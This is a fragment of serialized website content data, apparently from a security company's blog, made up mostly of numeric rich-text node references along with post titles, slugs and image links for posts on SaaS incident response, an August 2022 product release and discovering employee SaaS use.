,"nodeType":173},{},[],{"data":336656,"content":336657,"nodeType":254},{},[336658],{"data":336659,"content":336660,"nodeType":250},{},[336661],{"data":336662,"content":336663,"nodeType":254},{},[336664],{"data":336665,"content":336666,"nodeType":178},{},[336667],{"data":336668,"marks":336669,"value":318352,"nodeType":173},{},[],{"data":336671,"content":336672,"nodeType":254},{},[336673],{"data":336674,"content":336675,"nodeType":178},{},[336676],{"data":336677,"marks":336678,"value":318362,"nodeType":173},{},[],{"data":336680,"content":336681,"nodeType":254},{},[336682],{"data":336683,"content":336684,"nodeType":178},{},[336685],{"data":336686,"marks":336687,"value":318372,"nodeType":173},{},[],{"data":336689,"content":336690,"nodeType":178},{},[336691,336694,336701],{"data":336692,"marks":336693,"value":318379,"nodeType":173},{},[],{"data":336695,"content":336696,"nodeType":186},{"uri":318382},[336697],{"data":336698,"marks":336699,"value":318388,"nodeType":173},{},[336700],{"type":194},{"data":336702,"marks":336703,"value":318392,"nodeType":173},{},[],{"data":336705,"content":336706,"nodeType":235},{},[336707],{"data":336708,"marks":336709,"value":40632,"nodeType":173},{},[],{"data":336711,"content":336712,"nodeType":178},{},[336713],{"data":336714,"marks":336715,"value":318405,"nodeType":173},{},[],{"data":336717,"content":336720,"nodeType":312},{"target":336718},{"sys":336719},{"id":318410,"type":317,"linkType":318},[],{"data":336722,"content":336723,"nodeType":178},{},[336724],{"data":336725,"marks":336726,"value":37,"nodeType":173},{},[],{"entries":336728},{"inline":336729,"hyperlink":336730,"block":336737},[],[336731,336735],{"sys":336732,"__typename":1528,"title":336733,"slug":336734},{"id":317985},"Case study: Business Email Compromise (BEC) attack nearly cost us millions","case-study-business-email-compromise-bec-attack-nearly-cost-us-millions",{"sys":336736,"__typename":1528,"title":271616,"slug":271619},{"id":269414},[336738,336742,336749,336755,336760,336765],{"sys":336739,"__typename":5345,"title":330094,"caption":118,"layoutMode":118,"file":336740},{"id":318036},{"url":336741,"width":330097,"height":330098},"https://images.ctfassets.net/y1cdw1ablpvd/4mE1i0PWq5Tns9qbcvglZh/dcd08098c29b9d36e3cd501a83aaa9c9/image4.jpg",{"sys":336743,"__typename":5345,"title":336744,"caption":118,"layoutMode":118,"file":336745},{"id":318105},"Mail rules chatops",{"url":336746,"width":336747,"height":336748},"https://images.ctfassets.net/y1cdw1ablpvd/10Yy4SzIegYrYC9fGbVFO8/658e0e608c7f573ad648df4f9cd3a0a8/image2.png",589,169,{"sys":336750,"__typename":5345,"title":336751,"caption":118,"layoutMode":118,"file":336752},{"id":318157},"Malicious app permissions",{"url":336753,"width":336754,"height":121119},"https://images.ctfassets.net/y1cdw1ablpvd/KPK1ZRkwp1QCzkVpwoeUC/c064b2a4e89264a3bed9c47f45705625/image3.png",787,{"sys":336756,"__typename":5345,"title":336757,"caption":118,"layoutMode":118,"file":336758},{"id":318170},"Push malicious app ",{"url":336759,"width":186535,"height":290592},"https://images.ctfassets.net/y1cdw1ablpvd/5dOX0KB5yAME0gfERMZIij/e4d5e687df890dccf2d13b98904f420e/image5.png",{"sys":336761,"__typename":5345,"title":336762,"caption":118,"layoutMode":118,"file":336763},{"id":318183},"Powershell script IR blog",{"url":336764,"width":331556,"height":173206},"https://images.ctfassets.net/y1cdw1ablpvd/4xTQrOxKSTGKpNASlYwiOz/5f121b1f18507492ee0ba671712f3832/image1.png",{"sys":336766,"__typename":335449,"content":336767,"title":335461,"buttonText":335462,"buttonUrl":335463,"signupRedirectUrl":118},{"id":318410},{"json":336768},{"nodeType":165,"data":336769,"content":336770},{},[336771],{"nodeType":178,"content":336772,"data":336776},[336773],{"nodeType":173,"value":335457,"marks":336774,"data":336775},[],{},{},"content:blog:how-to-kick-off-an-incident-response-investigation-for-a-compromised-saas.json","blog/how-to-kick-off-an-incident-response-investigation-for-a-compromised-saas.json","blog/how-to-kick-off-an-incident-response-investigation-for-a-compromised-saas",{"_path":336781,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":336782,"ogImage":118,"summary":336784,"title":325439,"subtitle":118,"metaTitle":336795,"synopsis":325440,"hashTags":118,"publishedDate":325441,"slug":325442,"tagsCollection":336796,"relatedBlogPostsCollection":336800,"authorsCollection":337108,"content":337112,"_id":337450,"_type":5439,"_source":5440,"_file":337451,"_stem":337452,"_extension":5439},"/blog/product-release-august-2022",{"id":325081,"publishedAt":336783},"2024-06-21T14:06:38.152Z",{"json":336785},{"data":336786,"content":336787,"nodeType":165},{},[336788],{"data":336789,"content":336790,"nodeType":178},{},[336791],{"data":336792,"marks":336793,"value":336794,"nodeType":173},{},[],"The big news this month? You can now deploy the Push browser extension to your managed machines and browsers without needing interaction from users!","Push Security new product features for August 2022",{"items":336797},[336798],{"sys":336799,"name":18399},{"id":18398},{"items":336801},[336802],{"__typename":1528,"sys":336803,"content":336804,"title":332253,"synopsis":332254,"hashTags":118,"publishedDate":332255,"slug":332256,"tagsCollection":337100,"authorsCollection":337104},{"id":331914},{"json":336805},{"data":336806,"content":336807,"nodeType":165},{},[336808,336814,336844,336850,336857,336872,336877,336890,336895,336901,336906,336912,336918,336933,336941,336947,336953,336990,336995,337001,337016,337022,337028,337034,337040,337046,337052,337058,337064,337069,337093],{"data":336809,"content":336810,"nodeType":178},{},[336811],{"data":336812,"marks":336813,"value":331925,"nodeType":173},{},[],{"data":336815,"content":336816,"nodeType":250},{},[336817,336826,336835],{"data":336818,"content":336819,"nodeType":254},{},[336820],{"data":336821,"content":336822,"nodeType":178},{},[336823],{"data":336824,"marks":336825,"value":331938,"nodeType":173},{},[],{"data":336827,"content":336828,"nodeType":254},{},[336829],{"data":336830,"content":336831,"nodeType":178},{},[336832],{"data":336833,"marks":336834,"value":331948,"nodeType":173},{},[],{"data":336836,"content":336837,"nodeType":254},{},[336838],{"data":336839,"content":336840,"nodeType":178},{},[336841],{"data":336842,"marks":336843,"value":331958,"nodeType":173},{},[],{"data":336845,"content":336846,"nodeType":169},{},[336847],{"data":336848,"marks":336849,"value":331938,"nodeType":173},{},[],{"data":336851,"content":336852,"nodeType":178},{},[336853],{"data":336854,"marks":336855,"value":331972,"nodeType":173},{},[336856],{"type":1646},{"data":336858,"content":336859,"nodeType":178},{},[336860,336863,336869],{"data":336861,"marks":336862,"value":331979,"nodeType":173},{},[],{"data":336864,"content":336865,"nodeType":186},{"uri":285403},[336866],{"data":336867,"marks":336868,"value":331986,"nodeType":173},{},[],{"data":336870,"marks":336871,"value":39946,"nodeType":173},{},[],{"data":336873,"content":336876,"nodeType":312},{"target":336874},{"sys":336875},{"id":331994,"type":317,"linkType":318},[],{"data":336878,"content":336879,"nodeType":178},{},[336880,336883,336887],{"data":336881,"marks":336882,"value":332002,"nodeType":173},{},[],{"data":336884,"marks":336885,"value":332007,"nodeType":173},{},[336886],{"type":1646},{"data":336888,"marks":336889,"value":332011,"nodeType":173},{},[],{"data":336891,"content":336894,"nodeType":312},{"target":336892},{"sys":336893},{"id":332016,"type":317,"linkType":318},[],{"data":336896,"content":336897,"nodeType":178},{},[336898],{"data":336899,"marks":336900,"value":332024,"nodeType":173},{},[],{"data":336902,"content":336905,"nodeType":312},{"target":336903},{"sys":336904},{"id":332029,"type":317,"linkType":318},[],{"data":336907,"content":336908,"nodeType":178},{},[336909],{"data":336910,"marks":336911,"value":332037,"nodeType":173},{},[],{"data":336913,"content":336914,"nodeType":178},{},[336915],{"data":336916,"marks":336917,"value":332044,"nodeType":173},{},[],{"data":336919,"content":336920,"nodeType":178},{},[336921,336924,336930],{"data":336922,"marks":336923,"value":37,"nodeType":173},{},[],{"data":336925,"content":336926,"nodeType":186},{"uri":332053},[336927],{"data":336928,"marks":336929,"value":332058,"nodeType":173},{},[],{"data":336931,"marks":336932,"value":37,"nodeType":173},{},[],{"data":336934,"content":336937,"nodeType":169},{"target":336935},{"sys":336936},{"id":332066,"type":317,"linkType":318},[336938],{"data":336939,"marks":336940,"value":331948,"nodeType":173},{},[],{"data":336942,"content":336943,"nodeType":178},{},[336944],{"data":336945,"marks":336946,"value":332077,"nodeType":173},{},[],{"data":336948,"content":336949,"nodeType":178},{},[336950],{"data":336951,"marks":336952,"value":332084,"nodeType":173},{},[],{"data":336954,"content":336955,"nodeType":250},{},[336956,336972,336981],{"data":336957,"content":336958,"nodeType":254},{},[336959],{"data":336960,"content":336961,"nodeType":178},{},[336962,336965,336969],{"data":336963,"marks":336964,"value":332097,"nodeType":173},{},[],{"data":336966,"marks":336967,"value":332102,"nodeType":173},{},[336968],{"type":1646},{"data":336970,"marks":336971,"value":332106,"nodeType":173},{},[],{"data":336973,"content":336974,"nodeType":254},{},[336975],{"data":336976,"content":336977,"nodeType":178},{},[336978],{"data":336979,"marks":336980,"value":332116,"nodeType":173},{},[],{"data":336982,"content":336983,"nodeType":254},{},[336984],{"data":336985,"content":336986,"nodeType":178},{},[336987],{"data":336988,"marks":336989,"value":332126,"nodeType":173},{},[],{"data":336991,"content":336994,"nodeType":312},{"target":336992},{"sys":336993},{"id":332131,"type":317,"linkType":318},[],{"data":336996,"content":336997,"nodeType":178},{},[336998],{"data":336999,"marks":337000,"value":37,"nodeType":173},{},[],{"data":337002,"content":337003,"nodeType":178},{},[337004,337007,337013],{"data":337005,"marks":337006,"value":37,"nodeType":173},{},[],{"data":337008,"content":337009,"nodeType":186},{"uri":332147},[337010],{"data":337011,"marks":337012,"value":332058,"nodeType":173},{},[],{"data":337014,"marks":337015,"value":37,"nodeType":173},{},[],{"data":337017,"content":337018,"nodeType":169},{},[337019],{"data":337020,"marks":337021,"value":331958,"nodeType":173},{},[],{"data":337023,"content":337024,"nodeType":178},{},[337025],{"data":337026,"marks":337027,"value":332167,"nodeType":173},{},[],{"data":337029,"content":337030,"nodeType":178},{},[337031],{"data":337032,"marks":337033,"value":332174,"nodeType":173},{},[],{"data":337035,"content":337036,"nodeType":178},{},[337037],{"data":337038,"marks":337039,"value":332181,"nodeType":173},{},[],{"data":337041,"content":337042,"nodeType":178},{},[337043],{"data":337044,"marks":337045,"value":332188,"nodeType":173},{},[],{"data":337047,"content":337048,"nodeType":178},{},[337049],{"data":337050,"marks":337051,"value":332195,"nodeType":173},{},[],{"data":337053,"content":337054,"nodeType":178},{},[337055],{"data":337056,"marks":337057,"value":332202,"nodeType":173},{},[],{"data":337059,"content":337060,"nodeType":178},{},[337061],{"data":337062,"marks":337063,"value":332209,"nodeType":173},{},[],{"data":337065,"content":337068,"nodeType":312},{"target":337066},{"sys":337067},{"id":332214,"type":317,"linkType":318},[],{"data":337070,"content":337071,"nodeType":178},{},[337072,337075,337081,337084,337090],{"data":337073,"marks":337074,"value":332222,"nodeType":173},{},[],{"data":337076,"content":337077,"nodeType":186},{"uri":332225},[337078],{"data":337079,"marks":337080,"value":332230,"nodeType":173},{},[],{"data":337082,"marks":337083,"value":332234,"nodeType":173},{},[],{"data":337085,"content":337086,"nodeType":186},{"uri":332237},[337087],{"data":337088,"marks":337089,"value":323703,"nodeType":173},{},[],{"data":337091,"marks":337092,"value":332245,"nodeType":173},{},[],{"data":337094,"content":337095,"nodeType":178},{},[337096],{"data":337097,"marks":337098,"value":37,"nodeType":173},{},[337099],{"type":194},{"items":337101},[337102],{"sys":337103,"name":18399},{"id":18398},{"items":337105},[337106],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":337107},{"url":19129},{"items":337109},[337110],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":337111},{"url":19129},{"json":337113,"links":337424},{"data":337114,"content":337115,"nodeType":165},{},[337116,337122,337143,337149,337166,337186,337192,337232,337248,337253,337259,337265,337282,337297,337312,337327,337342,337359,337365,337371,337387,337392,337408],{"data":337117,"content":337118,"nodeType":169},{},[337119],{"data":337120,"marks":337121,"value":319335,"nodeType":173},{},[],{"data":337123,"content":337124,"nodeType":250},{},[337125,337134],{"data":337126,"content":337127,"nodeType":254},{},[337128],{"data":337129,"content":337130,"nodeType":178},{},[337131],{"data":337132,"marks":337133,"value":325104,"nodeType":173},{},[],{"data":337135,"content":337136,"nodeType":254},{},[337137],{"data":337138,"content":337139,"nodeType":178},{},[337140],{"data":337141,"marks":337142,"value":325114,"nodeType":173},{},[],{"data":337144,"content":337145,"nodeType":235},{},[337146],{"data":337147,"marks":337148,"value":325121,"nodeType":173},{},[],{"data":337150,"content":337151,"nodeType":178},{},[337152,337155,337159,337162],{"data":337153,"marks":337154,"value":325128,"nodeType":173},{},[],{"data":337156,"marks":337157,"value":325133,"nodeType":173},{},[337158],{"type":370},{"data":337160,"marks":337161,"value":325137,"nodeType":173},{},[],{"data":337163,"marks":337164,"value":325142,"nodeType":173},{},[337165],{"type":370},{"data":337167,"content":337168,"nodeType":178},{},[337169,337172,337176,337179,337183],{"data":337170,"marks":337171,"value":325149,"nodeType":173},{},[],{"data":337173,"marks":337174,"value":325154,"nodeType":173},{},[337175],{"type":1646},{"data":337177,"marks":337178,"value":2936,"nodeType":173},{},[],{"data":337180,"marks":337181,"value":325162,"nodeType":173},{},[337182],{"type":370},{"data":337184,"marks":337185,"value":325166,"nodeType":173},{},[],{"data":337187,"content":337188,"nodeType":178},{},[337189],{"data":337190,"marks":337191,"value":325173,"nodeType":173},{},[],{"data":337193,"content":337194,"nodeType":246189},{},[337195,337214,337223],{"data":337196,"content":337197,"nodeType":254},{},[337198],{"data":337199,"content":337200,"nodeType":178},{},[337201,337204,337211],{"data":337202,"marks":337203,"value":325186,"nodeType":173},{},[],{"data":337205,"content":337206,"nodeType":186},{"uri":325189},[337207],{"data":337208,"marks":337209,"value":325195,"nodeType":173},{},[337210],{"type":194},{"data":337212,"marks":337213,"value":247472,"nodeType":173},{},[],{"data":337215,"content":337216,"nodeType":254},{},[337217],{"data":337218,"content":337219,"nodeType":178},{},[337220],{"data":337221,"marks":337222,"value":325208,"nodeType":173},{},[],{"data":337224,"content":337225,"nodeType":254},{},[337226],{"data":337227,"content":337228,"nodeType":178},{},[337229],{"data":337230,"marks":337231,"value":325218,"nodeType":173},{},[],{"data":337233,"content":337234,"nodeType":178},{},[337235,337238,337245],{"data":337236,"marks":337237,"value":325225,"nodeType":173},{},[],{"data":337239,"content":337240,"nodeType":186},{"uri":325189},[337241],{"data":337242,"marks":337243,"value":325195,"nodeType":173},{},[337244],{"type":194},{"data":337246,"marks":337247,"value":325236,"nodeType":173},{},[],{"data":337249,"content":337252,"nodeType":312},{"target":337250},{"sys":337251},{"id":325241,"type":317,"linkType":318},[],{"data":337254,"content":337255,"nodeType":178},{},[337256],{"data":337257,"marks":337258,"value":325249,"nodeType":173},{},[],{"data":337260,"content":337261,"nodeType":178},{},[337262],{"data":337263,"marks":337264,"value":325256,"nodeType":173},{},[],{"data":337266,"content":337267,"nodeType":178},{},[337268,337271,337279],{"data":337269,"marks":337270,"value":37,"nodeType":173},{},[],{"data":337272,"content":337275,"nodeType":1698},{"target":337273},{"sys":337274},{"id":325267,"type":317,"linkType":318},[337276],{"data":337277,"marks":337278,"value":325272,"nodeType":173},{},[],{"data":337280,"marks":337281,"value":37,"nodeType":173},{},[],{"data":337283,"content":337284,"nodeType":178},{},[337285,337288,337294],{"data":337286,"marks":337287,"value":37,"nodeType":173},{},[],{"data":337289,"content":337290,"nodeType":186},{"uri":325284},[337291],{"data":337292,"marks":337293,"value":325289,"nodeType":173},{},[],{"data":337295,"marks":337296,"value":37,"nodeType":173},{},[],{"data":337298,"content":337299,"nodeType":178},{},[337300,337303,337309],{"data":337301,"marks":337302,"value":37,"nodeType":173},{},[],{"data":337304,"content":337305,"nodeType":186},{"uri":325301},[337306],{"data":337307,"marks":337308,"value":325306,"nodeType":173},{},[],{"data":337310,"marks":337311,"value":37,"nodeType":173},{},[],{"data":337313,"content":337314,"nodeType":178},{},[337315,337318,337324],{"data":337316,"marks":337317,"value":37,"nodeType":173},{},[],{"data":337319,"content":337320,"nodeType":186},{"uri":325318},[337321],{"data":337322,"marks":337323,"value":325323,"nodeType":173},{},[],{"data":337325,"marks":337326,"value":37,"nodeType":173},{},[],{"data":337328,"content":337329,"nodeType":178},{},[337330,337333,337339],{"data":337331,"marks":337332,"value":37,"nodeType":173},{},[],{"data":337334,"content":337335,"nodeType":186},{"uri":325335},[337336],{"data":337337,"marks":337338,"value":325340,"nodeType":173},{},[],{"data":337340,"marks":337341,"value":37,"nodeType":173},{},[],{"data":337343,"content":337344,"nodeType":178},{},[337345,337348,337356],{"data":337346,"marks":337347,"value":37,"nodeType":173},{},[],{"data":337349,"content":337352,"nodeType":1698},{"target":337350},{"sys":337351},{"id":189034,"type":317,"linkType":318},[337353],{"data":337354,"marks":337355,"value":325358,"nodeType":173},{},[],{"data":337357,"marks":337358,"value":37,"nodeType":173},{},[],{"data":337360,"content":337361,"nodeType":235},{},[337362],{"data":337363,"marks":337364,"value":325368,"nodeType":173},{},[],{"data":337366,"content":337367,"nodeType":178},{},[337368],{"data":337369,"marks":337370,"value":325375,"nodeType":173},{},[],{"data":337372,"content":337373,"nodeType":178},{},[337374,337377,337384],{"data":337375,"marks":337376,"value":325382,"nodeType":173},{},[],{"data":337378,"content":337379,"nodeType":186},{"uri":325385},[337380],{"data":337381,"marks":337382,"value":325391,"nodeType":173},{},[337383],{"type":194},{"data":337385,"marks":337386,"value":325395,"nodeType":173},{},[],{"data":337388,"content":337391,"nodeType":312},{"target":337389},{"sys":337390},{"id":325400,"type":317,"linkType":318},[],{"data":337393,"content":337394,"nodeType":178},{},[337395,337398,337405],{"data":337396,"marks":337397,"value":325408,"nodeType":173},{},[],{"data":337399,"content":337400,"nodeType":186},{"uri":301630},[337401],{"data":337402,"marks":337403,"value":325416,"nodeType":173},{},[337404],{"type":194},{"data":337406,"marks":337407,"value":325420,"nodeType":173},{},[],{"data":337409,"content":337410,"nodeType":178},{},[337411,337414,337421],{"data":337412,"marks":337413,"value":325427,"nodeType":173},{},[],{"data":337415,"content":337416,"nodeType":186},{"uri":301319},[337417],{"data":337418,"marks":337419,"value":301322,"nodeType":173},{},[337420],{"type":194},{"data":337422,"marks":337423,"value":325438,"nodeType":173},{},[],{"entries":337425},{"inline":337426,"hyperlink":337427,"block":337436},[],[337428,337433],{"sys":337429,"__typename":66743,"title":337430,"slug":337431,"audience":66746,"linkedFromParent":337432},{"id":325267},"Managed deployment using Google Admin console","managed-deployment-using-google-admin-console",{"slug":148507},{"sys":337434,"__typename":66743,"title":220965,"slug":220966,"audience":66746,"linkedFromParent":337435},{"id":189034},{"slug":148507},[337437,337443],{"sys":337438,"__typename":5345,"title":337439,"caption":118,"layoutMode":118,"file":337440},{"id":325241},"Browsers page",{"url":337441,"width":333817,"height":337442},"https://images.ctfassets.net/y1cdw1ablpvd/2B7ubyV06N2ZbRhDd3kuwG/5542462f05c1a8e400854fca2cae7c23/Screenshot_2022-08-24_at_17.49.07.png",328,{"sys":337444,"__typename":5345,"title":337445,"caption":118,"layoutMode":118,"file":337446},{"id":325400},"Aug 2022 SaaS Logos",{"url":337447,"width":337448,"height":337449},"https://images.ctfassets.net/y1cdw1ablpvd/IeRFlK22XAHiIzTKBdGIY/c876ae20448ad0306c1de3c4a9513362/newapps.png",742,386,"content:blog:product-release-august-2022.json","blog/product-release-august-2022.json","blog/product-release-august-2022",{"_path":337454,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":337455,"ogImage":118,"summary":337457,"title":322329,"subtitle":118,"metaTitle":337468,"synopsis":322330,"hashTags":118,"publishedDate":322331,"slug":322332,"tagsCollection":337469,"relatedBlogPostsCollection":337475,"authorsCollection":337779,"content":337783,"_id":338060,"_type":5439,"_source":5440,"_file":338061,"_stem":338062,"_extension":5439},"/blog/how-to-discover-saas-use-without-invading-employee-privacy",{"id":322023,"publishedAt":337456},"2024-03-21T09:25:03.554Z",{"json":337458},{"data":337459,"content":337460,"nodeType":165},{},[337461],{"data":337462,"content":337463,"nodeType":178},{},[337464],{"data":337465,"marks":337466,"value":337467,"nodeType":173},{},[],"Learn how to detect and secure employee SaaS use so you can help employees stay productive","How to discover employee SaaS use without being creepy",{"items":337470},[337471,337473],{"sys":337472,"name":274157},{"id":274156},{"sys":337474,"name":26133},{"id":26132},{"items":337476},[337477],{"__typename":1528,"sys":337478,"content":337479,"title":324173,"synopsis":324174,"hashTags":118,"publishedDate":323818,"slug":324175,"tagsCollection":337771,"authorsCollection":337775},{"id":323830},{"json":337480},{"data":337481,"content":337482,"nodeType":165},{},[337483,337489,337503,337509,337515,337521,337528,337534,337541,337566,337572,337578,337584,337590,337596,337602,337608,337614,337620,337626,337632,337638,337651,337657,337663,337669,337675,337681,337687,337693,337699,337705,337711,337716,337722,337744,337750,337756],{"data":337484,"content":337485,"nodeType":169},{},[337486],{"data":337487,"marks":337488,"value":323841,"nodeType":173},{},[],{"data":337490,"content":337491,"nodeType":178},{},[337492,337496,337499],{"data":337493,"marks":337494,"value":323849,"nodeType":173},{},[337495],{"type":1646},{"data":337497,"marks":337498,"value":39972,"nodeType":173},{},[],{"data":337500,"marks":337501,"value":323857,"nodeType":173},{},[337502],{"type":1646},{"data":337504,"content":337505,"nodeType":178},{},[337506],{"data":337507,"marks":337508,"value":323864,"nodeType":173},{},[],{"data":337510,"content":337511,"nodeType":178},{},[337512],{"data":337513,"marks":337514,"value":323871,"nodeType":173},{},[],{"data":337516,"content":337517,"nodeType":178},{},[337518],{"data":337519,"marks":337520,"value":323878,"nodeType":173},{},[],{"data":337522,"content":337523,"nodeType":178},{},[337524],{"data":337525,"marks":337526,"value":323886,"nodeType":173},{},[337527],{"type":370},{"data":337529,"content":337530,"nodeType":178},{},[337531],{"data":337532,"marks":337533,"value":323893,"nodeType":173},{},[],{"data":337535,"content":337536,"nodeType":169},{},[337537],{"data":337538,"marks":337539,"value":323901,"nodeType":173},{},[337540],{"type":370},{"data":337542,"content":337543,"nodeType":178},{},[337544,337547,337553,337556,337563],{"data":337545,"marks":337546,"value":323908,"nodeType":173},{},[],{"data":337548,"content":337549,"nodeType":186},{"uri":323911},[337550],{"data":337551,"marks":337552,"value":226380,"nodeType":173},{},[],{"data":337554,"marks":337555,"value":2936,"nodeType":173},{},[],{"data":337557,"content":337558,"nodeType":186},{"uri":323921},[337559],{"data":337560,"marks":337561,"value":323927,"nodeType":173},{},[337562],{"type":194},{"data":337564,"marks":337565,"value":323931,"nodeType":173},{},[],{"data":337567,"content":337568,"nodeType":178},{},[337569],{"data":337570,"marks":337571,"value":323938,"nodeType":173},{},[],{"data":337573,"content":337574,"nodeType":169},{},[337575],{"data":337576,"marks":337577,"value":323945,"nodeType":173},{},[],{"data":337579,"content":337580,"nodeType":178},{},[337581],{"data":337582,"marks":337583,"value":323952,"nodeType":173},{},[],{"data":337585,"content":337586,"nodeType":178},{},[337587],{"data":337588,"marks":337589,"value":323959,"nodeType":173},{},[],{"data":337591,"content":337592,"nodeType":178},{},[337593],{"data":337594,"marks":337595,"value":323966,"nodeType":173},{},[],{"data":337597,"content":337598,"nodeType":178},{},[337599],{"data":337600,"marks":337601,"value":323973,"nodeType":173},{},[],{"data":337603,"content":337604,"nodeType":178},{},[337605],{"data":337606,"marks":337607,"value":323980,"nodeType":173},{},[],{"data":337609,"content":337610,"nodeType":235},{},[337611],{"data":337612,"marks":337613,"value":323987,"nodeType":173},{},[],{"data":337615,"content":337616,"nodeType":178},{},[337617],{"data":337618,"marks":337619,"value":323994,"nodeType":173},{},[],{"data":337621,"content":337622,"nodeType":178},{},[337623],{"data":337624,"marks":337625,"value":324001,"nodeType":173},{},[],{"data":337627,"content":337628,"nodeType":178},{},[337629],{"data":337630,"marks":337631,"value":324008,"nodeType":173},{},[],{"data":337633,"content":337634,"nodeType":178},{},[337635],{"data":337636,"marks":337637,"value":324015,"nodeType":173},{},[],{"data":337639,"content":337640,"nodeType":178},{},[337641,337644,337648],{"data":337642,"marks":337643,"value":324022,"nodeType":173},{},[],{"data":337645,"marks":337646,"value":324027,"nodeType":173},{},[337647],{"type":1646},{"data":337649,"marks":337650,"value":324031,"nodeType":173},{},[],{"data":337652,"content":337653,"nodeType":178},{},[337654],{"data":337655,"marks":337656,"value":324038,"nodeType":173},{},[],{"data":337658,"content":337659,"nodeType":178},{},[337660],{"data":337661,"marks":337662,"value":324045,"nodeType":173},{},[],{"data":337664,"content":337665,"nodeType":169},{},[337666],{"data":337667,"marks":337668,"value":324052,"nodeType":173},{},[],{"data":337670,"content":337671,"nodeType":178},{},[337672],{"data":337673,"marks":337674,"value":324059,"nodeType":173},{},[],{"data":337676,"content":337677,"nodeType":178},{},[337678],{"data":337679,"marks":337680,"value":324066,"nodeType":173},{},[],{"data":337682,"content":337683,"nodeType":178},{},[337684],{"data":337685,"marks":337686,"value":324073,"nodeType":173},{},[],{"data":337688,"content":337689,"nodeType":235},{},[337690],{"data":337691,"marks":337692,"value":324080,"nodeType":173},{},[],{"data":337694,"content":337695,"nodeType":178},{},[337696],{"data":337697,"marks":337698,"value":324087,"nodeType":173},{},[],{"data":337700,"content":337701,"nodeType":178},{},[337702],{"data":337703,"marks":337704,"value":324094,"nodeType":173},{},[],{"data":337706,"content":337707,"nodeType":178},{},[337708],{"data":337709,"marks":337710,"value":324101,"nodeType":173},{},[],{"data":337712,"content":337715,"nodeType":312},{"target":337713},{"sys":337714},{"id":324106,"type":317,"linkType":318},[],{"data":337717,"content":337718,"nodeType":169},{},[337719],{"data":337720,"marks":337721,"value":324114,"nodeType":173},{},[],{"data":337723,"content":337724,"nodeType":178},{},[337725,337728,337732,337737,337741],{"data":337726,"marks":337727,"value":324121,"nodeType":173},{},[],{"data":337729,"marks":337730,"value":324126,"nodeType":173},{},[337731],{"type":370},{"data":337733,"marks":337734,"value":324132,"nodeType":173},{},[337735,337736],{"type":370},{"type":1646},{"data":337738,"marks":337739,"value":324137,"nodeType":173},{},[337740],{"type":370},{"data":337742,"marks":337743,"value":324141,"nodeType":173},{},[],{"data":337745,"content":337746,"nodeType":169},{},[337747],{"data":337748,"marks":337749,"value":324148,"nodeType":173},{},[],{"data":337751,"content":337752,"nodeType":178},{},[337753],{"data":337754,"marks":337755,"value":324155,"nodeType":173},{},[],{"data":337757,"content":337758,"nodeType":178},{},[337759,337762,337768],{"data":337760,"marks":337761,"value":324162,"nodeType":173},{},[],{"data":337763,"content":337764,"nodeType":186},{"uri":117883},[337765],{"data":337766,"marks":337767,"value":70282,"nodeType":173},{},[],{"data":337769,"marks":337770,"value":324172,"nodeType":173},{},[],{"items":337772},[337773],{"sys":337774,"name":117242},{"id":117241},{"items":337776},[337777],{"fullName":282557,"firstName":282557,"jobTitle":118,"profilePicture":337778},{"url":282559},{"items":337780},[337781],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":337782},{"url":19129},{"json":337784,"links":338047},{"data":337785,"content":337786,"nodeType":165},{},[337787,337793,337799,337805,337811,337817,337823,337829,337835,337841,337847,337853,337873,337889,337895,337901,337907,337964,337981,337996,338002,338008,338014,338019,338025,338031],{"data":337788,"content":337789,"nodeType":169},{},[337790],{"data":337791,"marks":337792,"value":322034,"nodeType":173},{},[],{"data":337794,"content":337795,"nodeType":178},{},[337796],{"data":337797,"marks":337798,"value":322041,"nodeType":173},{},[],{"data":337800,"content":337801,"nodeType":178},{},[337802],{"data":337803,"marks":337804,"value":322048,"nodeType":173},{},[],{"data":337806,"content":337807,"nodeType":169},{},[337808],{"data":337809,"marks":337810,"value":322055,"nodeType":173},{},[],{"data":337812,"content":337813,"nodeType":178},{},[337814],{"data":337815,"marks":337816,"value":322062,"nodeType":173},{},[],{"data":337818,"content":337819,"nodeType":178},{},[337820],{"data":337821,"marks":337822,"value":322069,"nodeType":173},{},[],{"data":337824,"content":337825,"nodeType":169},{},[337826],{"data":337827,"marks":337828,"value":322076,"nodeType":173},{},[],{"data":337830,"content":337831,"nodeType":178},{},[337832],{"data":337833,"marks":337834,"value":322083,"nodeType":173},{},[],{"data":337836,"content":337837,"nodeType":178},{},[337838],{"data":337839,"marks":337840,"value":322090,"nodeType":173},{},[],{"data":337842,"content":337843,"nodeType":169},{},[337844],{"data":337845,"marks":337846,"value":322097,"nodeType":173},{},[],{"data":337848,"content":337849,"nodeType":178},{},[337850],{"data":337851,"marks":337852,"value":322104,"nodeType":173},{},[],{"data":337854,"content":337855,"nodeType":178},{},[337856,337859,337863,337866,337870],{"data":337857,"marks":337858,"value":322111,"nodeType":173},{},[],{"data":337860,"marks":337861,"value":322116,"nodeType":173},{},[337862],{"type":1646},{"data":337864,"marks":337865,"value":322120,"nodeType":173},{},[],{"data":337867,"marks":337868,"value":322116,"nodeType":173},{},[337869],{"type":1646},{"data":337871,"marks":337872,"value":322128,"nodeType":173},{},[],{"data":337874,"content":337875,"nodeType":178},{},[337876,337879,337886],{"data":337877,"marks":337878,"value":322135,"nodeType":173},{},[],{"data":337880,"content":337881,"nodeType":186},{"uri":296916},[337882],{"data":337883,"marks":337884,"value":322143,"nodeType":173},{},[337885],{"type":194},{"data":337887,"marks":337888,"value":322147,"nodeType":173},{},[],{"data":337890,"content":337891,"nodeType":169},{},[337892],{"data":337893,"marks":337894,"value":322154,"nodeType":173},{},[],{"data":337896,"content":337897,"nodeType":178},{},[337898],{"data":337899,"marks":337900,"value":322161,"nodeType":173},{},[],{"data":337902,"content":337903,"nodeType":178},{},[337904],{"data":337905,"marks":337906,"value":322168,"nodeType":173},{},[],{"data":337908,"content":337909,"nodeType":250},{},[337910,337919,337928,337937,337946,337955],{"data":337911,"content":337912,"nodeType":254},{},[337913],{"data":337914,"content":337915,"nodeType":178},{},[337916],{"data":337917,"marks":337918,"value":322181,"nodeType":173},{},[],{"data":337920,"content":337921,"nodeType":254},{},[337922],{"data":337923,"content":337924,"nodeType":178},{},[337925],{"data":337926,"marks":337927,"value":322191,"nodeType":173},{},[],{"data":337929,"content":337930,"nodeType":254},{},[337931],{"dat